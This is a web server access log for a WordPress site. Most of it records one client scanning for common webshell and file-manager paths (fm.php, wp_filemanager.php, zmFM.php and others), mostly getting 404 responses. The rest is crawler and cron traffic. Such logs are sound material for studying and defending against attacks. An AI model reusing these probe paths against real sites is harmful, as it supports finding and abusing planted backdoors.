40.88.21.235 - - [01/Apr/2025:16:46:05 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "http://the80itspod.com/favicon.ico" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
172.177.66.130 - - [01/Apr/2025:17:20:05 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 9428 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:06 -0400] "GET /wp-includes/Text/network.php HTTP/1.1" 404 9428 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:08 -0400] "GET /wp-content/upgrade-temp-backup/wp-login.php HTTP/1.1" 404 9421 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:08 -0400] "GET /js/fm.php HTTP/1.1" 404 9428 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:09 -0400] "GET /wp-content/themes/astra/inc/ki1k.php HTTP/1.1" 404 9428 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:10 -0400] "GET /WordPress/wp-admin/includes/zmFM.php HTTP/1.1" 404 9428 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:11 -0400] "GET /default.php HTTP/1.1" 404 9421 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:12 -0400] "GET /ty.php HTTP/1.1" 404 9421 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:13 -0400] "GET /wp-content/themes/cay-van-phong/filemanager.php HTTP/1.1" 404 9421 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:14 -0400] "GET /fm.php HTTP/1.1" 404 9422 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:15 -0400] "GET /wp-content/plugins/seoplugins/index.php HTTP/1.1" 301 0 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:17 -0400] "GET /wp-content/plugins/seoplugins/ HTTP/1.1" 404 9421 "-" "-"
198.54.114.83 - - [01/Apr/2025:17:20:19 -0400] "POST /wp-cron.php?doing_wp_cron=1743542418.9333679676055908203125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
172.177.66.130 - - [01/Apr/2025:17:20:18 -0400] "GET /ini.php HTTP/1.1" 404 9428 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:19 -0400] "GET /libraries/legacy/info.php HTTP/1.1" 404 9420 "-" "-"
172.177.66.130 - - [01/Apr/2025:17:20:20 -0400] "GET /wp-content/themes/include.php HTTP/1.1" 200 0 "-" "-"
2a02:c206:3015:2326::1 - - [01/Apr/2025:17:31:18 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
158.69.23.79 - - [01/Apr/2025:17:45:59 -0400] "GET /wp-content/mu-plugins/index.php HTTP/1.1" 301 0 "-" "Linux Mozilla"
158.69.23.79 - - [01/Apr/2025:17:46:00 -0400] "GET /wp-content/mu-plugins/ HTTP/1.1" 404 9427 "-" "Linux Mozilla"
43.134.26.191 - - [01/Apr/2025:18:17:46 -0400] "GET / HTTP/1.1" 200 16759 "https://google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
